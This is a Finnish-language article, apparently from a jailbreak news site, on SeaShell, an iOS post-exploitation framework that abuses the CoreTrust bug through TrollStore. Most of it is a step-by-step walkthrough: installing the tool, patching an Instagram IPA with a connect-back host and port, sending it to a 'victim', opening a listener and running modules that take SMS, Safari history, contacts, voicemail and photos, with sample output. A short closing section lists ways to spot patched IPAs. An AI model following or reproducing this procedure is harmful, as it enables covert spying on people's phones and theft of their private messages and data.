SeaShell-troijalainen iOS:lle

Monet käyttäjät pitävät TrollStore IPA -asennusohjelman käyttämää CoreTrust-virhettä kätevänä ominaisuutena, joka helpottaa sovellusten ja säätöjen asentamista pysyvästi ilman rajoituksia mistä tahansa lähteestä iOS 14-, iOS 15- ja iOS 16 -käyttöjärjestelmiä käyttäviin iPhoneihin. Sillä on kuitenkin synkempi potentiaali, koska sitä voidaan hyödyntää iPhonen salaa hallinnan ottamiseksi, mikä mahdollistaa laitteesi salaa tapahtuvan vakoilun tietämättäsi.

Mikä on SeaShell?

SeaShell on kehys, joka on suunniteltu korjaamaan TrollStoren tai Esignin IPA-tiedostoa, mikä mahdollistaa haittaohjelmien injektoinnin. Tämä haittaohjelma mahdollistaa etäyhteyden kohdelaitteeseen ja muuttaa sen tehokkaasti troijalaiseksi uhrin iPhonella tai iPadilla. Hyödyntämällä CoreTrust-virhettä SeaShell toimii salaa aiheuttaen merkittäviä tietoturvariskejä käyttäjille. Korjattu IPA on asennettava TrollStoren tai TrollStore 2:n kanssa.

iOS:n hyökkäysten jälkeinen kehys nimeltä SeaShell antaa käyttäjille mahdollisuuden käyttää, käsitellä ja poimia tietoja kohdelaitteista etänä. Monipuolisen arkkitehtuurinsa ansiosta käyttäjät voivat vaivattomasti kehittää tiettyihin tehtäviin räätälöityjä mukautettuja moduuleja. SeaShell on kuitenkin valmiiksi varustettu useilla olennaisilla moduuleilla, jotka on suunniteltu arkaluonteisten tietojen saumattomaan poimimiseen. Lisäksi voit päivittää IPA:n Troijan hevosella.

Prosessin aloittamiseksi tarvitaan vain muokatun IPA-tiedoston luominen, joka voidaan sitten asentaa kohdelaitteeseen esimerkiksi TrollStoren tai minkä tahansa muun CoreTrust-rajoituksia kiertävän IPA-asennusohjelman kautta. Kun sovellus on asennettu onnistuneesti, kohteen tarvitsee vain käynnistää sovellus kerran ja sulkea se.

SeaShell tarjoaa toimintojensa joukossa moduuleja kriittisten datapisteiden poimimiseen. Käyttäjät voivat esimerkiksi hyödyntää moduulia hakeakseen AddressBook.sqlitedb-tiedostoon tallennettuja yksityiskohtaisia yhteystietoja. Lisäksi käyttäjät voivat tarkastella järjestelmätietoja, kuten laitetta ja asennettua iOS-laiteohjelmistoa, sekä ladata laitteella tai iCloudissa olevia valokuvia.

Lisäksi SeaShell helpottaa Safarin kirjanmerkkien ja selaushistorian tutkimista, jolloin käyttäjät voivat perehtyä kohdelaitteen digitaaliseen jalanjälkeen. Tämä ominaisuus mahdollistaa selaustietojen poimimisen ja tallentamisen kätevässä JSON-muodossa analysointia varten.

Lisäksi viitekehys sisältää moduuleja, jotka on omistettu vastaajaviestien tietojen käyttämiseen voicemail.db-tiedostosta, mikä tarjoaa tietoa viestintämalleista ja vuorovaikutuksesta. Lisäksi SeaShell tarjoaa toiminnon tekstiviestitietojen lataamiseen tai tarkasteluun, jolloin käyttäjät voivat seurata ja analysoida tekstiviestien vaihtoa ja siten paljastaa arvokkaita tietoja tai todisteita.

Yhteenvetona voidaan todeta, että SeaShell ei tarjoa ainoastaan joustavaa alustaa räätälöityjen moduulien kehittämiseen, vaan se sisältää myös joukon valmiita työkaluja, joiden tarkoituksena on poimia arkaluonteisia tietoja iOS-laitteista.

Huomautus: SeaShell edellyttää, että käyttäjät lataavat muokatun IPA-tiedoston, lataavat sen laitteelle TrollStoren avulla ja suorittavat sen ainakin kerran laitteen vaarantamiseksi.

Tämä kattava ominaisuuspaketti korostaa kehyksen tehokkuutta hyväksikäytön jälkeisissä skenaarioissa ja korostaa sen potentiaalia sekä laillisiin että haitallisiin tarkoituksiin.

SeaShell ylpeilee erittäin tehokkaalla ominaisuudella: kyvyllä kytkeytyä erilaisiin sovelluksiin, mukaan lukien, mutta ei rajoittuen, Contacts.app. Tämän toiminnallisuuden avulla käyttäjät saavat ennennäkemättömän hallinnan, jonka avulla he voivat korvata järjestelmäsovelluksia, tutkia sovelluskontteja, lisätä uusia prosesseja, korjata suoritettavia tiedostoja, muokata suoritettavien ohjelmien käyttöoikeuksia, ladata korjauksia ja paljon muuta. Siinä on myös sisäänrakennettu vaihtoehto uhrin soittimen hallitsemiseksi esimerkiksi pysäytä, toista ja jatka.

Tämän ominaisuuden avulla käyttäjät voivat siirtää iOS:n troijalaisen eri sovelluksiin, mukaan lukien järjestelmäsovellukset, kuten Laskin, Yhteystiedot jne.

Hyökkäyspotentiaali on rajaton, sillä SeaShell tarjoaa laajan valikoiman tapoja kehittyneisiin hyökkäyksiin ja manipulointiin. SeaShell hyödyntää Pwny-nimisen edistyneen hyötykuorman mahtavia ominaisuuksia, joka tunnetaan monimutkaisia hyväksikäyttötaktiikoita helpottavista ominaisuuksistaan. Pwnyn ytimessä SeaShell tarjoaa käyttäjille vankan kehyksen kehittyneiden kyberturvallisuuden alan manöövereiden suorittamiseen.

SeaShellin asentaminen

SeaShell on Python-skripti, joka voidaan kätevästi asentaa pip-paketinhallinnan kautta. Voit asentaa SeaShell-kehyksen syöttämällä seuraavan komennon terminaaliisi:

 pip3 install git+https://github.com/EntySec/SeaShell

Pwny on puhtaasti C-kielellä kirjoitettu edistyneen hyötykuorman toteutus, joka on suunniteltu siirrettävyyttä ja laajennettavuutta silmällä pitäen iOS-laitteille. Asenna pwny seuraavalla komennolla:

 pip3 install git+https://github.com/EntySec/HatSploit

SeaShell-kehyksen käyttö

SeaShell käyttää sovelluspakettiaan, joka sisältää yksinkertaisen suoritettavan tiedoston sekä toisen suoritettavan tiedoston, joka käynnistää Pwny-hyötytiedoston. Tämän työkalun avulla käyttäjät voivat muokata mitä tahansa IPA-tiedostoa, esimerkiksi korjaamalla muokatun Instagram IPA:n Troijan hevosella. On myös mahdollista luoda IPA-tiedosto, joka sisältää haittaohjelman väärennetyllä nimellä ja kuvakkeella.

Vaihe 1. Avaa päätesovellus ja suorita seashell-komento kehyksen suorittamiseksi.

 seashell

Vaihe 2. Korjaa IPA-tiedosto ja anna IP-osoitteesi ja porttisi yhteyttä varten.

(seashell)> ipa patch Instagram.ipa 
Host to connect back: 192.168.0.1 
Port to connect back: 8888 
IPA at Instagram.ipa patched.

Vaihe 3. Lähetä IPA uhrille asennusta varten TrollStoren kautta.

Vaihe 4. Avaa kuuntelija tietokoneellasi ja odota yhteyden muodostumista.

 (seashell)> listener on 0.0.0.0:8888

Vaihe 5. Onnistuneen yhteyden muodostamisen jälkeen suorita moduulit, kuten safari_history, player, sysinfo, sms, devices, ipa, voicemail, photos, safari_bookmarks, contacts jne.

 pwny:/ root# safari_history History.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s History.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing history database... History: Date URL ---- --- 2024-02-28 09:35:57 https://onejailbreak.com pwny:/ root#

Voit myöntää pääsyn tekstiviestitietoihin listaamalla tekstiviestisovelluksessa olevat keskustelut komennolla sms -l tai poimimalla keskusteluhistorian tietyn yhteyshenkilön kanssa komennolla sms .

 pwny:/ root# sms 123456789 sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing SMS for 123456789... Sms (11111111111): ID Date Status Text -- ---- ------ ---- 1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com pwny:/ root#

Kuinka tunnistaa SeaShell-troijalainen hevonen

Voit minimoida SeaShell-kehyksen kautta tapahtuvien hyökkäysten uhriksi joutumisen riskin noudattamalla joitakin ehdotuksia SeaShell-korjattujen IPA-tiedostojen oletuskokoonpanon havaitsemiseksi. Projekti on kuitenkin avoimen lähdekoodin ja arvoja voidaan helposti muokata omien arvojen mukauttamiseksi.

1. Pura asennettava IPA-tiedosto.
2. Tarkasta sovelluspaketista suoritettava tiedosto nimeltä "mussel", joka toimii Pwny-hyötykuorman esityksenä.
3. Tutki Info.plist-tiedostoa ja etsi "CFBundleBase64Hash", joka sisältää base64-koodatun isäntäparin (:).
4. Tarkista tiedoston hajautussumma varmistaaksesi sen eheyden ennen asennuksen jatkamista.

Kirjoittanut

Kuba Pawlak

Kuballa on yli 20 vuoden kokemus journalismista, ja hän on keskittynyt vankilakarkailuihin vuodesta 2012 lähtien. Hän on haastatellut useiden yritysten ammattilaisia. Journalismin lisäksi Kuba on erikoistunut videoiden editointiin ja drone-lennätykseen. Hän opiskeli tietotekniikkaa yliopistossa ennen kirjoittajan uraansa.

Lähetä kommentti